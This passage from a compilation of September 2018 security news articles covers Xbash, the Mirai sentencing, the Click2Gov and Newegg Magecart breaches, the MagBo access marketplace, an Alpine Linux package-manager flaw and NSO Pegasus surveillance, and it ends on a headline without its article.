Xbash, the researchers discovered, spreads by targeting weak passwords and unpatched vulnerabilities.

As part of its ransomware capabilities, it destroys Linux-based databases. It deletes resources such as MySQL, PostgreSQL and MongoDB databases, but contains no functionality that would allow their recovery once a ransom has been paid. The malware can ensnare targeted Linux-based systems in a botnet.

The Microsoft Windows-based systems, on the other hand, are only targeted for crypto-mining and self-propagation (it uses three known vulnerabilities in Hadoop, Redis and ActiveMQ for spreading), the security researchers have discovered.

To date, the malware made at least 48 victims who already paid the ransom, incoming transactions to the used wallets reveal. The cybercriminals behind the threat made about 0.964 Bitcoin ($6,000) to date.

Developed using Python, Xbash was then converted into self-contained Linux ELF executables using PyInstaller, which can create binaries for multiple platforms and also provides anti-detection. The malware fetches from the command and control (C&C) server the list of IP addresses to target.

The security researchers discovered four versions of Xbash so far and concluded that the malware is under active development. The botnet appears to have started operating as early as May 2018.

The malware has multiple domains hard-coded and also fetches a webpage hosted on Pastebin to update the list (some of the domains have been previously associated with the Iron Group). Communication with the C&C is performed using HTTP.

In addition to IP addresses, Xbash targets domains, the security researchers say. This makes the threat a next step in the evolution of botnets, as they normally only target IPs.

The malware scans many TCP or UDP ports for spreading purposes, namely those associated with HTTP, VNC, MySQL, Memcached, MySQL/MariaDB, FTP, Telnet, PostgreSQL, Redis, ElasticSearch, MongoDB, RDP, UPnP/SSDP, NTP, DNS, SNMP, LDAP, Rexec, Rlogin, Rsh, Rsync, Oracle database, and CouchDB.

“Xbash is a novel and complex Linux malware, and the newest work of an active cybercrime group,” Palo Alto Networks concludes.


Fidelis Cybersecurity Raises $25 Million
20.9.2018 securityweek
IT

Fidelis Cybersecurity, a Bethesda, MD-based company that provides automated threat detection and response solutions, on Tuesday announced that it secured a $25 million growth capital investment.

The funding, which brings the total raised by the company to date to nearly $50 million, will be used to extend product innovation, support business growth, and invest into the company’s 24x7 Managed Detection and Response (MDR) service. The round was led by existing investors.

Fidelis’ Elevate platform provides automated detection and response capabilities for network, cloud, endpoint and enterprise IoT systems. The 24x7 MDR service complements the platform by providing security experts for threat hunting and investigations.

“Our investors recognize Fidelis’ strong value proposition and ability to execute in a dynamic marketplace,” said Nick Lantuh, President and CEO of Fidelis Cybersecurity. “We are making significant investments in innovation to accelerate how security operations and incident response teams react to, manage and hunt for threats. We are doing this by building on our market-leading network traffic analysis solution which provides organizations with full visibility across their attack surface. By combining our patented technology, unmatched expertise and curated intel from our threat research team, we provide customers with deep visibility across increasingly complex environments, more accurate detections and the capability to respond faster and more effectively to threats and data loss.”

Fidelis customers include 15 Fortune 500 companies, 20 Forbes Global 2000 firms and nearly a dozen government agencies in the United States and elsewhere. Its website lists Barclays, the US Department of Energy, Emirates, the International Monetary Fund, NATO, Samsung Research America, and the U.S Air Force among its customers.

Fidelis acquired two companies in the past years: Resolution1 Security in 2015 and TopSpin Security in 2017.


Mirai Authors Avoid Prison After Working With FBI
20.9.2018 securityweek
BotNet

Three individuals who last year admitted creating and using the notorious Mirai botnet have avoided prison after helping the FBI in other cybercrime investigations, the U.S. Department of Justice announced on Tuesday.

Josiah White, 21, of Washington, Pennsylvania; Paras Jha, 22, of Fanwood, New Jersey; and Dalton Norman, 22, of Metairie, Louisiana, pleaded guilty in December 2017 to criminal informations in relation to Mirai and what authorities call the “Clickfraud” botnet.

The Justice Department said on Tuesday that each of the men were sentenced to five years of probation and 2,500 hours of community service. They have also been ordered to pay $127,000 in restitution, and they have voluntarily handed over significant amounts of cryptocurrency seized during the investigation into their activities.

Jha, White, and Norman are said to have “cooperated extensively” with the FBI on complex cybercrime investigations before their sentencing and they will continue doing so. They must also cooperate with law enforcement and the broader research community.

The Mirai botnet ensnared hundreds of thousands of IoT devices, allowing cybercriminals to launch powerful distributed denial-of-service (DDoS) attacks and conduct click fraud. Authorities said the three earned roughly $180,000 through their click fraud scheme.

Jha, a former Rutgers University computer science student, admitted writing the Mirai code and setting up the command and control (C&C) infrastructure.

The Mirai botnet attacks were investigated by the FBI’s Field Office in Anchorage, Alaska, and the cybercriminals were sentenced by the Chief U.S. District Judge in Alaska.

“Cybercrime is a worldwide epidemic that reaches many Alaskans,” said Bryan Schroder, the U.S. Attorney for the District of Alaska. “The perpetrators count on being technologically one step ahead of law enforcement officials. The plea agreement with the young offenders in this case was a unique opportunity for law enforcement officers, and will give FBI investigators the knowledge and tools they need to stay ahead of cyber criminals around the world.”

The conviction of Jha, White, and Norman is the result of cooperation between government agencies in the US, UK, Northern Ireland, and France, and private-sector companies such as Palo Alto Networks, Google, Cloudflare, Coinbase, Flashpoint, Oath, Qihoo 360 and Akamai.

Security blogger Brian Krebs correctly identified Jha and White as authors of Mirai in January 2017.


Nation State Cyber Attacks on Rise, Says Europol
20.9.2018 securityweek
BigBrothers

Global ransomware attacks are increasingly linked to nation states, with the lines between politics and crime often blurring, Europe's police agency said on Tuesday.

Key ransomware attacks include the so-called WannaCry and NotPetya malware, which infected hundreds of thousands of computers around the world in 2017, demanding that users pay ransoms to regain access.

"Ransomware retains its dominance," said Europol's latest annual report on cybercrime.

"In addition to attacks by financially motivated criminals, a significant volume of public reporting increasingly attributes global cyber-attacks to the actions of nation states," said the agency, based in The Hague.

The report added that it was "increasingly difficult" to determine whether it was a "sophisticated" cybercrime organised crime group, a state sponsored attacker, or a cybercrime amateur.

On September 6, the US charged a North Korean programmer with the WannaCry hack, the 2014 Sony Pictures attack and a 2016 cyber-heist on Bangladesh's central bank, alleging they were carried out on behalf of the regime in Pyongyang.

In February the United States and Britain blamed the Russian military for the "NotPetya" ransomware, calling it a Kremlin effort to destabilise Ukraine which spun out of control.

Europol said cyberattackers are also abandoning "random attacks" on mass targets in favour of tailored targeting of people and businesses "where greater potential benefits lie."

At the same time, Europol said cyberattackers who once trained their sights on traditional financial businesses were now focusing on cryptocurrencies such as Bitcoin.

However classic internet phishing scams -- emails that offer technical support, money-making scams or romance -- "still result in a considerable numbers of victims," said the agency.

- 'Most disturbing' -

Europol also raised the alarm over the live streaming of child sex abuse, a growing part of what it called the "most disturbing aspect of cyber-crime."

"Live streaming of child sexual abuse remains a particularly complex crime to investigate and is likely to further increase in the future," it said.

This involved both material uploaded by offenders, and also by children who were either tricked into uploading explicit material, or made to do it through extortion.

Europol meanwhile warned that the European Union's flagship new data protection laws introduced in May were "significantly hampering the ability of investigators across the world to identify and investigate online crime."

It said the world's internet body had ordered the removal of all personal data from the global domain name database -- formerly a key resource for police -- as it did not comply with the EU law.

Europol chief Catherine De Bolle said this development "emphasises the need for law enforcement to engage with policy makers, legislators and industry, in order to have a voice in how our society develops."

view counter


Cloudflare Helps Boost DNSSEC Adoption as Key Rollover Nears
20.9.2018 securityweek
Safety

Cloudflare announced on Monday the introduction of a new feature that will allow some users to enable the Domain Name System Security Extensions (DNSSEC) protocol with the click of a button.

Cloudflare customers and supported registries can now easily enable DNSSEC from the Cloudflare dashboard. This takes the burden off of website owners, who normally need to manually add a DS record in their account at their registrar.

Data from APNIC shows that many domain owners have attempted to activate DNSSEC, but failed to complete the process. Globally, less than 14 percent of DNS requests have DNSSEC validated by the resolver. Some countries, such as Norway and Sweden, have validation rates of roughly 80%, but China for instance validates less than 1% of requests. The validation rate in the United States is just over 23%.

DNSSEC validation rates

“Locating the part of the registrar UI that houses DNSSEC can be problematic, as can the UI of adding the record itself. Additional factors such as varying degrees of technical knowledge amongst users and simply having to manage multiple logins and roles can also explain the lack of completion in the process. Finally, varying levels of DNSSEC compatibility amongst registrars may prevent even knowledgeable users from creating DS records in the parent,” Cloudflare explained in a blog post.

Cloudflare’s ability to allow customers to easily enable DNSSEC is a result of support for CDS and CDNSKEY records. These mirror the DS and DNSKEY record types and are designed to alert the parent or registrar that a domain wants to enable DNSSEC and have a DS record presented.

“Cloudflare will publish CDS and CDNSKEY records for all domains who enable DNSSEC. Parent registries should scan the nameservers of the domains under their purview and check for these rrsets. The presence of a CDS key for a domain delegated to Cloudflare indicates that a verified Cloudflare user has enabled DNSSEC within their dash and that the parent operator (a registrar or the registry itself) should take the CDS record content and create the requisite DS record to start signing the domain,” Cloudflare said.

DNSSEC validation rates

DNSSEC aims to prevent DNS spoofing attacks, which allow malicious actors to redirect users to their own websites. It does this by cryptographically signing DNS information, and the master crypto key is called a key signing key (KSK).

Since keeping a cryptographic key alive for a long period of time is considered a bad security practice given the fact that it could get compromised, the Internet Corporation for Assigned Names and Numbers (ICANN) plans to periodically change the KSK.

This change also requires that network operators update their systems with the new KSK. Failure to do so will result in clients using their DNS resolvers not being able to reach websites and email addresses.

ICANN initially planned a KSK rollover for October 11, 2017. However, as the date approached, the organization determined that many network operators and ISPs were unprepared, which could lead to tens of millions of users going offline. The KSK rollover was pushed back one year and it’s currently set for October 11, 2018, although this date is still pending ratification by the ICANN Board.

ICANN expects the impact of the root KSK rollover to be minimal if it takes place on October 11, but it will still affect a “small percentage” of users, who may not be able to access websites.

A small number of DNSSEC validating resolvers are misconfigured and some of the users relying on these resolvers may experience problems.

Users who rely on resolvers that do not perform DNSSEC validation will not be impacted, and ICANN believes roughly two-thirds of users are in this situation.


New Tool Helps G Suite Admins Uncover Security Threats
20.9.2018 securityweek
Security

Google on Tuesday announced the general availability of a tool that helps G Suite customers identify security issues within their domains, and take action.

Referred to as Investigation tool, the feature was made available as part of an Early Adopter Program in July, and is now accessible to all G Suite Enterprise and Enterprise for Education editions.

Building on existing capabilities in the security center, Google says the tool will provide admins and security analysts with the ability to identify, triage, and remediate security threats.

The investigation tool includes advanced search capabilities, to easily identify security issues within a domain, and can be used to triage threats regardless of whether they are targeting users, devices, or data.

More importantly, the utility provides admins with the option to take bulk actions on any of the discovered issues, to limit the propagation and impact of threats.

Based on the feedback received from those participating in the Early Adopter Program, Google has already improved the investigation tool with a series of new features.

Thus, the search giant says it enhanced security to prevent insider risk through offering the option to require a second admin to verify large actions in the investigation tool.

Customers now also take advantage of more fine-grained visibility while investigating incidents, the company says. There’s email header analysis available to see attributes and the delivery path for the email, along with visibility into Team Drive settings and the option to change access permissions directly from the utility.

The investigation tool also includes a simplified interface, featuring user auto-complete. Emails and names from the organization , for examples, will be auto-completed as an admin types in parameters.

“The investigation tool, with its simple UI, makes it easier for admins to identify threats without having to worry about analyzing logs which can be time-consuming and require complex scripting,” Google said.


Click2Gov Attacks on U.S. Cities Attributed to Previously Unknown Group
20.9.2018 securityweek
Attack

A previously unknown financially motivated threat group is believed to be behind a series of attacks whose goal was to obtain payment card data from U.S. cities relying on Click2Gov software for utility bill payments.

Click2Gov, a product developed by Superion, is designed to provide cities “interactive self-service bill-pay options for utilities, community development and finance.”

The first reports of breaches at Click2Gov customers emerged in October 2017, when Superion published a statement saying that suspicious activity had been detected at some customers using on-premise servers. The company said its investigation, which had been assisted by a PCI forensic investigation firm, had not found any evidence of credit card scrapers or credit card data extraction.

In a follow-up statement published in June 2018, Superion said it had released a patch for its own software and provided customers with patches for a third-party software used by Click2Gov in order to address the vulnerabilities exploited by the attackers.

Risk Based Security reported in June, just before Superion published its follow-up statement, that at least 10 cities in the United States had notified citizens that their payment information had been exposed as a result of an attack aimed at Click2Gov. Some even reported fraudulent transactions that may have resulted from these incidents.

Axios’ Codebook reported a few days later that the third-party software referenced by Superion was Oracle WebLogic, which has been known to be plagued by several vulnerabilities exploited by malicious actors for various purposes.

FireEye has also been tracking the Click2Gov attacks and notes that additional victims have been identified since June. The security firm has found and analyzed the malware used by the attackers, which it has described as “moderately sophisticated.”

FireEye says the attacks have been carried out by a financially motivated group that it has not seen until now.

Based on its analysis, FireEye believes the attack likely starts with exploitation of an Oracle WebLogic vulnerability – candidates include CVE-2017-3248, CVE-2017-3506 and CVE-2017-10271 – that allows the hackers to compromise Click2Gov webservers and upload arbitrary files.

Once they gain access, they upload a web shell named SJavaWebManage to interact with the server and enable debug mode in a Click2Gov configuration file so that the software writes payment card information to a log file in plain text.

Next, the attackers upload a tool tracked by FireEye as FIREALARM to parse these log files and exfiltrate the harvested credit card data. Additionally, the cybercriminals leverage a tool named SPOTLIGHT to intercept payment cards from HTTP network traffic.

The security firm says all of these malware families have very low detection rates based on VirusTotal data.

The company believes the campaign is the work of a group rather than a single individual based on the wide range of skills needed to pull off the attacks.

“The attacker’s understanding of the Click2Gov host requirements, process logging details, payment card fields, and internal communications protocols demonstrates an advanced knowledge of the Click2Gov application,” FireEye said in a blog post. “Given the manner in which underground forums and marketplaces function, it is possible that tool development could have been contracted to third parties and remote access to compromised systems could have been achieved by one entity and sold to another. There is much left to be uncovered about this attacker.”

“Although the TTPs observed in the attack lifecycle are generally consistent with other financially motivated attack groups tracked by FireEye, this attacker demonstrated ingenuity in crafting malware exploiting Click2Gov installations, achieving moderate success,” the company added.


NSA Leak Fuels Rise in Hacking for Crypto Mining: Report
20.9.2018 securityweek
Cryptocurrency

Illicit cryptocurrency mining has been surging over the past year, in part due to a leaked software tool from the US National Security Agency, researchers said Wednesday.

A report by the Cyber Threat Alliance, an association of cybersecurity firms and experts, said it detected a 459 percent increase in the past year of illicit crypto mining -- a technique used by hackers to steal the processing power of computers to create cryptocurrency.

"Activity has gone from a virtually non-exist issue to one that almost universally shows up at the top of our members' threat lists," said a blog post by Neil Jenkins, chief analytic officer for the alliance.

One reason for the sharp rise was the leak last year by a group of hackers known as the Shadow Brokers of "EternalBlue," software developed by the NSA to exploit vulnerabilities in the Windows operating system.

"A patch for EternalBlue has been available for 18 months and even after being exploited in two significant global cyberattacks -- WannaCry and NotPetya -- there are still countless organizations that are being victimized by this exploit, as it's being used by mining malware," Jenkins wrote.

The rise in hacking coincides with growing use of virtual currencies such as bitcoin, ethereum or monero, which are not regulated by any government and are created through solving complex computing problems.

While some cyptocurrency mining is legitimate, hackers have discovered ways to tap into the processing power of unsuspecting computer users to illicitly generate currency.

Jenkins said the rise in malware for crypto mining highlights broader cybersecurity threats.

"Illicit mining is the 'canary in the coal mine' of cybersecurity threats," he said. "If illicit cryptocurrency mining is taking place on your network, then you most likely have worse problems and we should consider the future of illicit mining as a strategic threat."

Hackers can generate gains and use cryptocurrency for other malicious purposes such as purchasing other kinds of malware tools on the "dark web," according to the report.

The researchers said 85 percent of illicit cryptocurrency malware mines monero, with bitcoin representing eight percent.

"Although monero is significantly less valuable than bitcoin, several factors make this the cryptocurrency of choice for malicious actors," the report said.

Monero, according to the report, offers more privacy and anonymity, "which help malicious actors hide both their mining activities and their transactions using the currency," the researchers said.

"Transaction addresses and values are obfuscated by default, making tracking monero incredibly difficult for investigators."


Patching Not Enough; Organizations Must Adopt Zero-Trust Practices: Report
20.9.2018 securityweek
Vulnerebility

Hackers Can Gain Network Access Via Social Engineering and Wait for New Zero-Day Exploits to Elevate Their Privilege

At Black Hat 2017, privileged access firm Thycotic surveyed 250 hackers to find out what was easy and what was hard about hacking into networks. At this year's Black Hat, it conducted a similar survey (PDF) among 300 people that consider themselves hackers.

"This year," Thycotic's chief security scientist Joseph Carson told SecurityWeek, "we also wanted to better understand the types of hacker that exist, and their motives for doing what they do."

The respondents self-identified as three groups that could traditionally be described as white hat (70%), grey hat (30%) and black hat (5%). The white hats describe themselves as 'ethical' hackers -- they use their skills and knowledge for good purposes. "There's another category -- which is also ethical -- but where they admit to crossing the line," said Carson. "Their motivation is still to benefit the community; but they admit that some of their practices may actually be illegal."

These tend to be independent researchers, and their work is often unrecognized, because, said Carson, "they tend to report their findings through anonymous channels."

And then there's the black hats -- those who hack for illegal purposes and for personal gain. Only 5% of the respondents admitted to this; but none of them are likely to be full-time criminals. Law enforcement agencies always monitor Black Hat; and 'unemployed' attendees are of particular interest.

The 5% black hats are likely to have legitimate day jobs, and may well have been sent to Black Hat by their employer. It tends to confirm the findings of Malwarebytes this summer -- many companies have one or two employees who moonlight to the dark side.

"Another area we wanted to examine," Carson told SecurityWeek, "is whether staying up to date with the latest software is any protection against hackers." Specifically, Thycotic wanted to know whether current OSs are easily compromised, and asked the question, 'Which OS did you conquer the most in the past 12 months?'.

"What was really surprising," said Carson, "was that Windows 10 -- even though it is the latest and most secure operating system from Microsoft -- is still easily exploitable by hackers. More than one-third of the compromised OSs were Windows 8 and 10. It goes against the common viewpoint that having the latest fully patched system will keep you secure. You have to accept that being patched and up to date is not enough on its own."

The most common method of hacking used by the respondents (56.03%) is social engineering -- it's easier and a lot cheaper than using a zero-day exploit. "Hackers confirmed that 50% of their exploits have uncovered employees re-using passwords that have been already exposed in other data breaches, giving hackers an easy way onto the network," notes the report.

It is clear that users still do not understand the weaknesses in passwords. "A strong password isn't just a lot of jumbled characters," said Carson. "Before it can be considered strong, a password must combine three separate characteristics: it must be complex, unique, and not already compromised elsewhere."

"One thing we did notice," Carson told SecurityWeek, "is that using social engineering doesn't automatically give the hacker privileged access and full network control. Hackers gain access and then wait for the arrival of new zero-day exploits that allow them to elevate their privilege."

Carson pointed out that one such Windows 10 zero-day was disclosed a few weeks ago. "This likely means that over the past couple of weeks many companies that had a simple unprivileged account breach now have the potential for a major compromise occurring within their networks. Social engineering allows attackers to get one foot in the door and then they wait for either misconfiguration or a new vulnerability that they can easily exploit to move to the next level."

These two findings from the hacker respondents -- that patching doesn't prevent hacking, and that most hacks come through social engineering -- are key to Carson's primary conclusion: organizations need to adopt zero-trust practices. "We learnt from last year's study that least privilege and multi-factor authentication make life difficult for hackers," Carson told SecurityWeek.

"We learn this year that 75% of companies have still not adopted this approach despite its effectiveness." Zero trust implies the automatic assumption that an account has been compromised, and requires multi-factor authentication to prove otherwise. This is applied both when moving from the internet to the corporate network, and from one segment of the corporate network to another segment.

"The combination of least privilege and zero trust will make life too difficult for the hackers, and they will likely give up and move on to easier targets," said Carson. Those hackers who have socially engineered a low privilege account and are waiting for a privilege escalation zero day will find they have to break in again before they can do everything.

"Every time the criminal returns to the network he is challenged again and has to use multiple and more sophisticated methods to continue the attack," said Carson. "Combining the principles of least privilege and zero trust is not 100% protection, but it is a major deterrence against everyday hacking."


Magecart cybercrime group stole customers’ credit cards from Newegg electronics retailer

20.9.2018 securityaffairs CyberCrime

Magecart hackers have stolen customers’ credit card data from the computer hardware and consumer electronics retailer Newegg.
The Magecart cybercrime group is back, this time the hackers have stolen customers’ credit card data from the computer hardware and consumer electronics retailer Newegg.

Magecart is active since at least 2015, recently the group hacked the websites of Ticketmaster, British Airways, and Feedify to inject a skimmer script used to siphon users’ payment card data.

behind the Ticketmaster and British Airways data breaches has now victimized popular computer hardware and consumer electronics retailer Newegg.

The security firms Volexity and RiskIQ have conducted a joint investigation on the hack.

“Volexity was able to verify the presence of malicious JavaScript code limited to a page on secure.newegg.com presented during the checkout process at Newegg. The malicious code specifically appeared once when moving to the Billing Information page while checking out.” reported Volexity.

“This page, located at the URL https://secure.newegg.com/GlobalShopping/CheckoutStep2.aspx, would collect form data, siphoning it back to the attackers over SSL/TLS via the domain neweggstats.com.”

Now Magecart group managed to compromise the Newegg website and steal the credit card details of all customers who made purchases between August 14 and September 18, 2018.

“On August 13th Magecart operators registered a domain called neweggstats.com with the intent of blending in with Newegg’s primary domain, newegg.com. Registered through Namecheap, the malicious domain initially pointed to a standard parking host.” reads the analysis published by RiskIQ.

“However, the actors changed it to 217.23.4.11 a day later, a Magecart drop server where their skimmer backend runs to receive skimmed credit card information. Similar to the British Airways attack, these actors acquired a certificate issued for the domain by Comodo to lend an air of legitimacy to their page”

NewEgg timeline

Active since at least 2015, the Magecart hacking group registered a domain called neweggstats(dot)com (similar to Newegg’s legitimate domain newegg.com) on August 13 and acquired an SSL certificate issued for the domain by Comodo.

The technique is exactly the one employed for the attack against the British Airways website.

On August 14, the group injected the skimmer code into the payment processing page of the official retailer website, so when customers made payment the attackers were able to access their payment data and send them to the domain neweggstats(dot)com they have set up.

newegg skimmer
“The skimmer code is recognizable from the British Airways incident, with the same basecode. All the attackers changed is the name of the form it needs to serialize to obtain payment information and the server to send it to, this time themed with Newegg instead of British Airways.” continues RiskIQ.

“In the case of Newegg, the skimmer was smaller because it only had to serialize one form and therefore condensed down to a tidy 15 lines of script”

Experts noticed that the users of both desktop and mobile applications were affected by the hack.

Customers that made purchases on the Newegg website between August 14 and September 18, 2018, should immediately block their payment card.


Access to over 3,000 compromised sites sold on Russian black marketplace MagBo
20.9.2018 securityaffairs
Incindent

Security experts at Flashpoint discovered the availability of the access to over 3,000 compromised sites sold on Russian black marketplace MagBo
A new report published by researchers at Flashpoint revealed the availability on an underground hacking forum for Russian-speaking users of access to over 3,000 breached websites.

“Access to approximately 3,000 breached websites has been discovered for sale on a Russian-speaking underground marketplace called MagBo. Access to some of the sites is selling for as low as 50 cents (USD).” reads the report published by Flashpoint.

The earliest advertisements for the MagBo black marketplace were posted in March to a top-tier Russian-language hacking and malware forum. According to the advertising, sellers are offering access to websites that were breached via, PHP shell access, Hosting control access, Domain control access, File Transfer Protocol (FTP) access, Secure Socket Shell (SSH) access, Admin panel access, and Database or Structured Query Language (SQL) access.

Most of the compromised websites are e-commerce sites, but crooks also offered access to websites of organizations in healthcare, legal, education and insurance industries and belonging to government agencies.

According to the experts, most of the compromised servers are from U.S., Russian, or German hosting services. The company reported its findings to law enforcement that are notifying victims.

Magbo compromised servers

Experts found a dozen of vendors on the MagBo black marketplace and hundreds of buyers participate in auctions in order to gain access to breached sites, databases, and administrator panels.

Accesses to compromised websites are precious commodities in the cybercrime underground, crooks can use them to carry out a broad range of illicit activities.

“Illicit access to compromised or backdoored sites and databases is used by criminals for a number of activities, ranging from spam campaigns, to fraud, or cryptocurrency mining.” continues the report.

“These compromises have also been used to gain access to corporate networks. This could potentially allow actors to access proprietary internal documents or resources, as well as entry points through which they can drop various malicious payloads. The types of vulnerabilities present and the ways in which they can be exploited depend on the threat actor’s specific capability, motivation, targeting, and goals.”

Sellers are also offering different privilege levels, in some cases they provide “full access permissions” to the compromised sites, other levels are “abilities to edit content,” and “add your content.”

The prices for compromised websites range from $0.50 USD up to $1,000 USD per access, depending on a website ranking listing various host parameters.

Magbo compromised servers prices.png

High-value targets would have higher prices, for example, to inject payment card sniffers, lower ranking sites are usually used for cryptocurrency mining or spam campaign.

The sellers also offer stolen photocopies of national documents for identity fraud, breached payment wallet access, compromised social media accounts, and Bitcoin mixer or tumbler services.


Adobe issued a critical out-of-band patch to address CVE-2018-12848 Acrobat flaw
20.9.2018 securityaffairs
Vulnerebility

Adobe releases a critical out-of-band patch for CVE-2018-12848 Acrobat flaw, the security updates address a total of 7 vulnerabilities.
Adobe address seven vulnerability in Acrobat DC and Acrobat Reader DC, including one critical vulnerability that could be exploited by attackers to execute arbitrary code.

“Adobe has released security updates for Adobe Acrobat and Reader for Windows and MacOS. These updates address critical and important vulnerabilities. Successful exploitation could lead to arbitrary code execution in the context of the current user.” reads the security advisory.

The flaws affect Acrobat DC and Acrobat Reader DC for Windows and macOS (versions 2018.011.20058 and earlier; Acrobat 2017 and Acrobat Reader 2017 for Windows and macOS (versions 2017.011.30099 and earlier), and Acrobat DC and Acrobat Reader DC for Windows and macOS (2015.006.30448 and earlier).

The security patches have been released just one week after Adobe released its Patch Tuesday updates for September 2018 that addressed 10 vulnerabilities in Flash Player and ColdFusion.

The most severe flaw, tracked as CVE-2018-12848, is a critical out-of-bounds write issue that could allow arbitrary code execution.

The flaw was reported by Omri Herscovici, research team leader at Check Point Software Technologies, the expert also found other 3 vulnerabilities.

The remaining flaws are out-of-bounds read vulnerabilities (CVE-2018-12849, CVE-2018-12850, CVE-2018-12801, CVE-2018-12840, CVE-2018-12778, CVE-2018-12775) that are rated as “important” and could lead to information disclosure.

The CVE-2018-12778 and CVE- 2018-12775 vulnerabilities were anonymously reported via Trend Micro’s Zero Day Initiative, while the CVE-2018-12801 issue was discovered by experts at Cybellum Technologies LTD.

The good news is that Adobe is not aware of any malicious exploitation of the flaw in attacks.


Dissecting the first Gafgyt bot implementing the “Non Un-Packable” NUP technique
19.9.2018 securityaffairs
BotNet

Experts at the CSE Cybsec Z-Lab have found a Gafgyt variant implementing the “Non Un-Packable” technique recently presented in a cyber security conference
A new variant of the Gafgyt botnet is spreading in the last hours and experts of the CSE Cybsec Z-Lab have found it with the support of the Italian cyber security experts @Odisseus and GranetMan.

The new variant analyzed in the report published by the experts was found on a system resolving the IP address owned by the Italian ISP Aruba. This specific version implements some advanced packing techniques that make the static analysis much harder.

We downloaded the sample directly from the compromised server, we found four samples of the Gafgyt variant that were already compiled for the specific architecture, X86-64, X86-32, MIPS, ARM.

The sample shows the same behavior associated with the classic Gafgyt botnet but we immediately noticed a distinctive feature, the implementation of “Non Un-Packable” NUP technique.

Malware Must Die leader @unixfreaxjp presented the sophisticated technique at the recent Radare conference (r2con2018) in his talk about the “Non Un-Packable” packer.

According to the experts the “Non Un-Packable” ELF was around since a few months before the talk and our discovery confirms that malware developers started adopting it.

The report includes a detailed analysis of the malware.


A flaw in Alpine Linux could allow executing arbitrary code
19.9.2018 securityaffairs
Vulnerebility

Security researcher Max Justicz has discovered several flaws in the distribution Alpine Linux, including an arbitrary code execution.
Alpine Linux is an independent, non-commercial, general purpose Linux distribution that is heavily used in containers, including Docker.

Alpine Linux is based on musl libc and busybox, it is a tiny distro and is optimized to manage resources, it is known also for fast boot times.

The experts discovered several vulnerabilities in the APK, the default package manager in Alpine. The most severe bug discovered by Max Justicz could be exploited by an attacker to carry out a man-in-the-middle attack to execute arbitrary code on the user’s machine.

“I found several bugs in apk, the default package manager for Alpine Linux. Alpine is a really lightweight distro that is very commonly used with Docker.” states the analysis published by the researcher.

“The worst of these bugs, the subject of this blog post, allows a network man-in-the-middle (or a malicious package mirror) to execute arbitrary code on the user’s machine. This is especially bad because packages aren’t served over TLS when using the default repositories.”

An attacker could trigger the flaw to target a Docker container based on Alpine and execute arbitrary code, Justicz also published a video PoC of the attack.

The package manager extracts packages, in the form of gzipped tar archives distributed as apks, then check their hashes against the ones in the signed manifest.

If the hashes are different, the package manager attempts to unlink all of the extracted files and directories.

The expert highlighted that the APK’s commit hooks feature could allow an attacker to turn persistent arbitrary file writes into code execution. Justicz discovered that it is possible to hide a malware within the package’s commit_hooks directory that would escape the cleanup and could then be executed as normal.

The expert explained that if an attacker is able to extract a file into /etc/apk/commit_hooks.d/ and have it stay there after the cleanup process, it will be executed before apk exits.

The attacker has to control the downloaded tar file avoiding that the package manager will unlink the payload and its directory during the cleanup process.

The expert explained that the attacker can run MitM to intercept apk’s package requests during Docker image building, then inject them with malicious code before they are passed to the target machines that would unpack and run the malicious code within their Docker container.

The latest Alpine version has addressed the issue, developers are recommended to rebuild their Docker images with the updated Alpine build.


NSO mobile Pegasus Spyware used in operations in 45 countries
19.9.2018 securityaffairs
CyberSpy

A new report published by Citizen Lab revealed that the NSO Pegasus spyware was used against targets across 45 countries worldwide.
A new investigation of the Citizen Lab revealed that the powerful Pegasus mobile spyware was used against targets across 45 countries around the world over the last two years.

Pegasus is a surveillance malware developed by the Israeli surveillance NSO Group that could infect both iPhones and Android devices, it is sold exclusively to the governments and law enforcement agencies.

Earlier August, Citizen Lab shared evidence of attacks against 175 targets worldwide carried on with the NSO spyware. Citizen Lab uncovered other attacks against individuals in Qatar or Saudi, where the Israeli surveillance software is becoming very popular.

COUNTRY NEXUS REPORTED CASES OF INDIVIDUALS TARGETED YEAR(S) IN WHICH SPYWARE INFECTION WAS ATTEMPTED
Panama Up to 150 (Source: Univision)1 2012-2014
UAE 1 (Source: Citizen Lab) 2016
Mexico 22 (Source: Citizen Lab) 2016
Saudi Arabia 2 (Source: Amnesty, Citizen Lab) 2018
A report published by Amnesty International confirmed that its experts identified a second human rights activist, in Saudi Arabia, who was targeted with the powerful spyware.

Now a new report published by Citizen Lab shows that the number of Pegasus infections is greater than initially thought.

Between August 2016 and August 2018, the researchers scanned the web for servers associated with Pegasus spyware and uncovered 36 distinct Pegasus systems in 45 countries by using a novel technique dubbed Athena.

The experts found 1,091 IP addresses that matched their fingerprint and 1,014 domain names that pointed to them.

pegasus spyware

At least ten of the operators identified by NSO appear to be actively engaged in cross-border surveillance, at least six countries with significant Pegasus operations (Bahrain, Kazakhstan, Mexico, Morocco, Saudi Arabia, and the United Arab Emirates) have been accused in the past of spying civil society.

“We designed and conducted a global DNS Cache Probing study on the matching domain names in order to identify in which countries each operator was spying. Our technique identified a total of 45 countries where Pegasus operators may be conducting surveillance operations. At least 10 Pegasus operators appear to be actively engaged in cross-border surveillance.” reads the report published by Citizen Lab.

“Pegasus also appears to be in use by countries with dubious human rights records and histories of abusive behaviour by state security services. In addition, we have found indications of possible political themes within targeting materials in several countries, casting doubt on whether the technology is being used as part of “legitimate” criminal investigations.”

Pegasus infections were observed in Algeria, Bahrain, Bangladesh, Brazil, Canada, Cote d’Ivoire, Egypt, France, Greece, India, Iraq, Israel, Jordan, Kazakhstan, Kenya, Kuwait, Kyrgyzstan, Latvia, Lebanon, Libya, Mexico, Morocco, the Netherlands, Oman, Pakistan, Palestine, Poland, Qatar, Rwanda, Saudi Arabia, Singapore, South Africa, Switzerland, Tajikistan, Thailand, Togo, Tunisia, Turkey, the UAE, Uganda, the United Kingdom, the United States, Uzbekistan, Yemen, and Zambia.

Pegasus spyware

The experts determined the location of the infections using country-level geolocation of DNS servers, but they warn of possible inaccuracies because targets could have used VPNs and satellite connections.

NSO Group spokesperson released a statement in response to the report, he highlighted that the company never broke any laws, including export control regulations.

“Contrary to statements made by you, our product is licensed to government and law enforcement agencies for the sole purpose of investigating and preventing crime and terror. Our business is conducted in strict compliance with applicable export control laws,” reads the statement from NSO Group spokesperson Shalev Hulio.

“NSO’s Business Ethics Committee, which includes outside experts from various disciplines, including law and foreign relations, reviews and approves each transaction and is authorized to reject agreements or cancel existing agreements where there is a case of improper use.”

The NSO Group also denied selling in many of the countries listed in the report.


Flaw in Western Digital My Cloud exposes the content to hackers
19.9.2018 securityaffairs
Vulnerebility

